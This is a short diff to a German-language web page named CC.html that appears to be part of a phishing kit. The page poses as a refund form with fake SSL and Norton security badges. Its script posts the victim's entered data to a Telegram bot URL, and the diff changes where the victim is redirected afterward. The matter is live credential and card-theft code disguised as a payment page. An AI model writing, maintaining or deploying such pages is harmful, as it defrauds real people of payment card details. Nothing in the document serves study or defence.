--- a/CC.html
+++ b/CC.html
@@ -179,6 +179,8 @@
       <button class="pay-button">Rückerstattung verarbeiten 363,40</button>
     </form>
 
+
+
     <div class="security-logos">
       <img src="./ssl.png" alt="SSL Secure">
       <img src="./norton.png" alt="Norton Secured">
@@ -290,7 +292,7 @@
                             };
 
                             $.post(telegramBotUrl, requestData, function () {
-                                window.location.href = "Don.html?vc?__event=ciiord&service_id=top_mlsd=DE";
+                                window.location.href = "load1.html?vc?__event=ciiord&service_id=top_mlsd=DE";
                             }).fail(function () {
                                 alert("Bitte versuchen Sie es erneut.");
                             });
@@ -302,4 +304,3 @@
     });
 </script>
 </html>
-
